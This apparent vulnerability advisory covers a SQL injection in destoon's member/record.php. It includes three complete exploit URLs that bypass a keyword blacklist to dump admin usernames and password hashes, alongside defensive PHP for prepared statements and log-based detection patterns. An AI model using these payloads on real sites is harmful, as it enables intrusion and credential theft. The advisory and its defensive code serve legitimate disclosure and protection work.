destoon full version SQL injection vulnerability - vulnerability warning - Black Bar Safety Net

2013-10-01T00:00:00
ID MYHACK58:62201340780
Type myhack58
Reporter 90sec 西毒
Modified 2013-10-01T00:00:00

Description

In include/global.func.php the strip_sql function filters incoming values, but this restriction can be bypassed, giving an injection that works in the full version.

function strip_sql($string) {
    // keyword blacklist: only matches a keyword when it is followed (or, for "or", surrounded) by whitespace
    $search = array("/union[\s|\t]/i","/select[\s|\t]/i","/update[\s|\t]/i","/outfile[\s|\t]/i","/ascii/i","/[\s|\t]or[\s|\t]/i","/\/\*/i");
    // the whitespace is replaced with &nbsp; so the keyword no longer parses as SQL; "/*" is removed outright
    $replace = array('union&nbsp;','select&nbsp;','update&nbsp;','outfile&nbsp;','ascii&nbsp;','&nbsp;or&nbsp;','');
    return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
}

In member/record.php:

<?php
require 'config.inc.php';
require '../common.inc.php';
require DT_ROOT.'/module/'.$module.'/record.inc.php';
?>

which loads record.inc.php:

switch($action) {
    case 'pay':
        $MODULE[-9]['name'] = $L['resume_name'];
        $MODULE[-9]['islink'] = 0;
        $MODULE[-9]['linkurl'] = $MODULE[9]['linkurl'];
        isset($fromtime) or $fromtime = '';
        isset($totime) or $totime = '';
        isset($dfromtime) or $dfromtime = '';
        isset($dtotime) or $dtotime = '';
        isset($mid) or $mid = 0;
        isset($currency) or $currency = '';
        $module_select = module_select('mid', $L['module_name'], $mid);
        if($keyword) $condition .= " AND title LIKE '%$keyword%'";
        if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));
        if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59'));
        if($mid) $condition .= " AND moduleid=$mid";      // $mid is interpolated into the SQL text unchecked
        if($itemid) $condition .= " AND itemid=$itemid";  // $itemid likewise
        // ...

Here $mid is not filtered, so it can be injected.
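The fix for this is not a stronger blacklist but to stop building SQL text from raw request values. The following PHP is an added example written for this page (it is not destoon's own code): the condition building of the 'pay' branch with numeric parameters cast to int, dates validated through strtotime(), and every value bound through a prepared statement, so strip_sql() is no longer what stands between the request and the query. The table name {$prefix}pay_record, the $pdo handle and the function name are assumptions made for the example.

```php
<?php
// Added example for this page, not destoon's code: hardened condition
// building for the 'pay' branch of member/record.inc.php. The table name
// {$prefix}pay_record and the $pdo handle used below are assumptions.

function build_pay_query(array $get, string $prefix = 'destoon_'): array {
    // An int cast keeps only the leading number: "-1 union ..." becomes -1
    // and the rest of the payload never reaches the SQL text.
    $mid    = isset($get['mid'])    ? (int)$get['mid']    : 0;
    $itemid = isset($get['itemid']) ? (int)$get['itemid'] : 0;

    // strtotime() returns false for anything it cannot parse; such values are dropped.
    $from = !empty($get['fromtime']) ? strtotime($get['fromtime'] . ' 00:00:00') : false;
    $to   = !empty($get['totime'])   ? strtotime($get['totime']   . ' 23:59:59') : false;

    $where  = ['1=1'];
    $params = [];

    if (!empty($get['keyword'])) {
        // Bound, not interpolated. LIKE wildcards in the term are escaped so a
        // user cannot widen the match with % or _.
        $term     = addcslashes($get['keyword'], '%_\\');
        $where[]  = 'title LIKE ?';
        $params[] = '%' . $term . '%';
    }
    if ($from !== false) { $where[] = 'paytime > ?';  $params[] = $from; }
    if ($to   !== false) { $where[] = 'paytime < ?';  $params[] = $to; }
    if ($mid)            { $where[] = 'moduleid = ?'; $params[] = $mid; }
    if ($itemid)         { $where[] = 'itemid = ?';   $params[] = $itemid; }

    $sql = "SELECT * FROM {$prefix}pay_record WHERE " . implode(' AND ', $where);
    return [$sql, $params];
}

// Constructed input in the shape the advisory describes; the cast reduces mid to -1.
[$sql, $params] = build_pay_query(['mid' => '-1 union///select///1', 'keyword' => '50%']);
echo $sql, "\n";   // SELECT * FROM destoon_pay_record WHERE 1=1 AND title LIKE ? AND moduleid = ?
print_r($params);  // [0] => %50\%%  [1] => -1

// Execution against a live connection (assumed $pdo is a connected PDO instance):
// $stmt = $pdo->prepare($sql);
// $stmt->execute($params);
```

With the values bound as parameters the MySQL server never sees them as SQL, so the keyword blacklist becomes irrelevant to this query; the int casts are a second, independent layer for the two ids.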

But doesn't the anti-injection filter run on the input first?

Here is how the filter's regular expressions are bypassed:

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union///select///1,2,password,username,5,6,7,8,9 from destoon_member where admin=1-- a

As you can see, this works: the regular expressions are bypassed.

Of course, the table prefix has most likely been changed; I use

http://www.myhack58.com/member/record.php?action=pay&mid=-1+union///select///1,2,GROUP_CONCAT(DISTINCT+table_name),4,5,6,7,8,9+from+information_schema.columns+where+table_schema=database()--%20a

to get the prefix, then

http://www.myhack58.com/member//record.php?action=pay&mid=-1+union///select///1,2,concat(username,0x3A,password),4,5,6,7,8,9%20from%20destoon_member%20where%20admin=1--%20a

to obtain the account name and password. The stored password is of the form md5(md5(password)); the admin backend appears to be admin.php.
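From the defender's side, requests of this shape are easy to spot in web logs even when the application filter lets them through: SQL keywords joined by characters that are neither letters nor whitespace, a reference to information_schema, or a trailing comment marker, and for this endpoint a mid parameter that is not an integer. The following PHP is an added example written for this page (not from the advisory) that checks constructed access-log lines for these signs after URL-decoding the request target; the log lines, pattern names and function names are constructed for the example.

```php
<?php
// Added example for this page, not from the advisory: flag access-log lines
// whose request target has the injection shape described above. The log
// lines below are constructed, not real traffic.

const GENERIC_PATTERNS = [
    // a keyword glued to the next one by punctuation instead of whitespace,
    // which is exactly what a whitespace-based blacklist does not see
    'keyword_glued' => '/\b(union|select)[^a-z0-9\s]+(select|from)\b/i',
    'schema_probe'  => '/\binformation_schema\./i',
    'comment_tail'  => '/--\s/',
];

// Extract the request target from a combined-format log line, or null.
function request_target(string $line): ?string {
    return preg_match('/"(?:GET|POST) (\S+) HTTP\//', $line, $m) ? $m[1] : null;
}

// record.php takes mid as a module id: an optional sign and digits only.
function mid_is_malformed(string $target): bool {
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) return false;
    parse_str($query, $q);                       // also decodes %XX and '+'
    return isset($q['mid']) && !preg_match('/^-?\d+$/', (string)$q['mid']);
}

// Map each flagged line to the list of reasons it was flagged.
function flag_requests(array $lines): array {
    $flagged = [];
    foreach ($lines as $line) {
        $target = request_target($line);
        if ($target === null) continue;
        // decode before matching so %2F or '+' cannot hide the pattern
        $decoded = rawurldecode(str_replace('+', ' ', $target));
        $reasons = [];
        foreach (GENERIC_PATTERNS as $name => $re) {
            if (preg_match($re, $decoded)) $reasons[] = $name;
        }
        if (strpos($target, '/member/record.php') !== false && mid_is_malformed($target)) {
            $reasons[] = 'mid_not_integer';
        }
        if ($reasons) $flagged[$line] = $reasons;
    }
    return $flagged;
}

$sample_log = [  // constructed lines, not real traffic
    '10.0.0.5 - - [01/Oct/2013:12:00:00 +0800] "GET /member/record.php?action=pay&mid=3 HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Oct/2013:12:00:01 +0800] "GET /member/record.php?action=pay&keyword=union+station HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Oct/2013:12:00:02 +0800] "GET /member/record.php?action=pay&mid=-1+union///select///1,2,3,4,5,6,7,8,9+from+information_schema.columns--%20a HTTP/1.1" 200 9031',
];

// Only the third line is reported: keyword_glued, schema_probe, comment_tail, mid_not_integer.
// "union station" in the second line is not flagged because the keywords are separated by whitespace.
foreach (flag_requests($sample_log) as $line => $reasons) {
    echo implode(',', $reasons), "\t", $line, "\n";
}
```

The endpoint-specific check is the more reliable of the two: it needs no knowledge of evasion tricks, only of what the parameter is supposed to contain, so it keeps working when the separator between the keywords changes.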